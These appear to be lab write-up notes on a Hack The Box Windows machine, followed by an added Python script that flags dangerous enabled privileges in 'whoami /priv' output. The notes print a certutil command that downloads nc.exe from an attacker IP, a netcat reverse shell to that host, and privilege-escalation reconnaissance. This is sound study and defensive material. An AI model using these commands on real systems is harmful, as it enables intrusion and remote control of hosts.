7 :80 spectral.worker.htb shell
# whoami /priv and systeminfo (below) show we can use PrintSpoofer, so first get a cmd shell (instead of PS)
# using webshell
certutil.exe -urlcache -f http://10.10.16.7/nc.exe C:\Users\Public\nc.exe
C:\Users\Public\nc.exe 10.10.16.7 6969 -e cmd.exe
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.203] 50353
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: WORKER
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hotfix(s): 5 Hotfix(s) Installed.
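Added example (not part of the original notes): a small audit script that parses `whoami /priv` output like the table above and flags enabled privileges that let a service account such as an IIS app pool identity escalate, which is the condition these notes spot. The privilege watch-list and the function names are my assumptions.

```python
import re

# Constructed sample: the `whoami /priv` table from the notes, copied verbatim.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Assumed watch-list: token privileges a service account should not hold
# enabled, because code running in that process can use them to run as
# SYSTEM (SeImpersonatePrivilege is the case the notes hit).
TOKEN_ABUSE_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# One table row: privilege name, free-text description, then the state.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_privileges(output: str) -> dict:
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def enabled_token_abuse_privs(privs: dict) -> list:
    """Return the watch-listed privileges that are actually Enabled."""
    return sorted(p for p, state in privs.items()
                  if state == "Enabled" and p in TOKEN_ABUSE_PRIVS)

def audit(output: str, account: str) -> str:
    """One-line finding suitable for a host audit report or detection rule."""
    hits = enabled_token_abuse_privs(parse_privileges(output))
    if not hits:
        return f"{account}: no token-abuse privileges enabled"
    return f"{account}: HIGH RISK, enabled {', '.join(hits)}"

if __name__ == "__main__":
    print(audit(SAMPLE_WHOAMI_PRIV, r"iis apppool\defaultapppool"))
```

Running it on the sample reports the app pool account as high risk because SeImpersonatePrivilege is enabled while SeAssignPrimaryTokenPrivilege is present but disabled.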